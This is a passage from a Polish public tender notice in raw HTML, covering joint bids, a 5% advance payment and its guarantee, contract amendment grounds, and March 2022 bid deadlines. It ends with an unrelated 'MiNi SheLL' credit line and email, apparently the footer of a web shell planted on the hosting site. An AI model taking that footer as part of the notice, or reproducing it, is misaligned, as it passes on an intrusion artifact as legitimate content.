poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej; <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a:<br/>1.Wykonawcy występujący wspólnie.<br/>1.1Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.2Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>1.4Jeżeli oferta Wykonawców występujących wspólnie została wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej<br/>współpracę tych Wykonawców.<br/>1.5W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w art. 128 ust. 1, PZP składa każdy z wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowan <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.Zamawiający dopuszcza wypłatę Wykonawcy zaliczki w wysokości 5% wartości<br/>wynagrodzenia wskazanego w ust. 1.<br/>2.Podstawą do wypłaty zaliczki będzie dokonanie odbioru częściowego potwierdzającego osiągnięcie określonego w danym punkcie harmonogramu stanu zaawansowania robót/prac na zasadach określonych w niniejszej umowie.<br/>3.Wypłata zaliczki nastąpi w terminie 30 dni od otrzymania przez Zamawiającego faktury<br/>zaliczkowej wystawionej na kwotę wynikającą z treści harmonogramu oraz potwierdzonej w toku<br/>odbioru częściowego zakresem zrealizowanych robót, po dostarczeniu załączników, o których<br/>mowa § 4 ust. 2 w zakresie, w jakim dotyczy to tego etapu robót.<br/>4.Zamawiający żąda od Wykonawcy wniesienia zabezpieczenia zaliczki<br/>(tj. zabezpieczenia zwrotu zaliczki) w następujących formach według wyboru Wykonawcy:<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych;<br/>5.Udzielenie zaliczki możliwe jest jedynie po uprzednim wniesieniu przez Wykonawcę zabezpieczenia zwrotu zaliczki w ww. formach. Okres obowiązywania zabezpieczenia zaliczki obejmuje termin liczony od dnia złożenia go w siedzibie Zamawiającego do dnia wykonania umowy określonego w umowie.<br/>6.Zabezpieczenie musi obejmować 100 % wartości zaliczki, która ma być wypłacona w danym momencie. W przypadku, gdy zabezpieczenie zostanie wniesione w kwocie niższej od planowanej kwoty zaliczki, zaliczka zostanie wypłacona do kwoty zabezpieczenia. Zabezpieczenie zaliczki wnosi się poprzez złożenie w oryginale dokumentu w siedzibie Zamawiającego. Oryginał dokumentu zabezpieczenia zostanie zwrócony w dniu podpisania protokołu końcowego odbioru robót.<br/>7.Zaliczka zostanie wpłacona na konto wskazane przez Wykonawcę po uprzednim wniesieniu zabezpieczenia zaliczki, w terminie wskazanym w umowie. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany (aneksowania) umowy w przypadku okoliczności, których strony nie mogły wcześniej przewidzieć, a powodują, że jej realizacja na warunkach w niej zawartych nie będzie możliwa przez m. in.: <br/>a)	konieczność wprowadzenia istotnych zmian w dokumentacji projektowej lub konieczność wykonania dodatkowego projektu,<br/>b)	w przypadku konieczności wykonania robót zamiennych, uzupełniających lub podobnych mogących mieć wpływ na termin realizacji umowy,<br/>c)	ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania, co nie wynika z winy Wykonawcy,<br/>d)	w przypadku wystąpienia ewentualnych nieprzewidzianych w dokumentacji projektowej kolizji z istniejącym uzbrojeniem terenu,<br/>e)	w przypadku wystąpienia konieczności zmian harmonogramu rzeczowo-finansowego, na które Zamawiający wyraził zgodę,<br/>f)	w przypadku zmiany osoby/ób odpowiedzialnej za nadzorowanie i kierowanie robotami dopuszcza się zmianę pod warunkiem, że zaproponowana przez wykonawcę osoba posiada uprawnienia w zakresie wymaganym dla odpowiedniej branży , które było określone w Specyfikacji Warunków Zamówienia lub ogłoszeniu o zamówieniu,<br/>g)	w przypadku wystąpienia szczególnie niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie robót – jedynie za zgodą Zamawiającego<br/>h)	w przypadku zmiany prawa podatkowego – w zakresie zmiany podatku VAT na roboty objęte umową,<br/>i)	w przypadku dopuszczalnej prawem zmiany stron umowy, ich przekształcenia lub zmiany oznaczenia stron umowy,<br/>j)	w przypadku zmian dopuszczonych przepisami prawa w szczególności art. 455 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>k)	w przypadku wystąpienia siły wyższej.<br/>3.	Zmiany, o których mowa w pkt. 2 mogą dotyczyć wszystkich istotnych postanowień umowy, w tym w szczególności w zakresie wysokości wynagrodzenia, terminu realizacji, harmonogramu, itp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.sidaspzp.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-02 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com